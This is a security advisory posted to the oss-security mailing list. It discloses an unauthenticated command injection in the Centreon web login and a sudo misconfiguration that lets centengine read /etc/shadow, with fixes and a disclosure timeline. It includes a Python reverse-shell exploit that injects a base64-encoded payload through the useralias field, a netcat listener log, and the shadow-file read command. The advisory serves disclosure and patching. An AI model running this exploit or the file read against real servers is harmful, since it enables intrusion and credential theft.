Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 25 Feb 2016 11:08:39 +0100
From: Sysdream Labs <>
Subject: CVE ID Request : Centreon remote code execution

Unauthenticated Remote Command Execution in Centreon Web Interface


Centreon is a popular monitoring solution.

A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.

SQL injection leading to RCE

Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

Proof of Concept

TCP Reverse Shell using python.

    #!/usr/bin/env python
    import requests
    import argparse

    def shell(target, reverseip, reverseport):
        payload = 'import socket as a,subprocess as b,os as
% (reverseip,reverseport)
        print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
        req =, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
        print "[+] DEAD !"

    if __name__ == "__main__":
        print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
        parser = argparse.ArgumentParser()
        parser.add_argument("--target", required=True)
        parser.add_argument("--reverseip", required=True)
        parser.add_argument("--reverseport", required=True, type=int)
        args = parser.parse_args()
        shell(, args.reverseip, args.reverseport)

Shell :

    nightlydev@...rkstation ~/Lab/Centreon $ python
--reverseip= --reverseport 8888
    [~] Centreon Unauthentificated RCE - Nicolas Chatelain
    [~] Starting reverseshell : - port : 8888

# Other term

nightlydev@...rkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( )
Ncat: Listening on :::8888
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
apache centreon-engine centreon-broker centreon nagios

Vulnerable code

The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:

		 * print Error in log file.
		exec("echo \"".$string."\" >> ".$this->errorType[$id]);

In class/centreonAuth.class.php, line 227:

	 $DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND 		 `contact_register` = '1' LIMIT 1");


Update to the Centreon 2.5.4

Possible root password disclosure in centengine (Centreon Entreprise Server)

In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.

**Access Vector**: local

**Security Risk**: high

**Vulnerability**: CWE-209

Proof of Concept

    $ sudo /usr/sbin/centengine -v /etc/shadow
    [1416391088] reading main config file
    [1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:

Vulnerable code

In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon

CENTREON   ALL = NOPASSWD: /usr/sbin/centengine -v *


Do not allow centengine to be run as root or do not disclose the line
that caused the error.

Timeline (dd/mm/yyyy)

* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities



Affected versions

* Centreon <= 2.5.3


* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

Best regards,

47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website:
* Twitter: @sysdream

Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ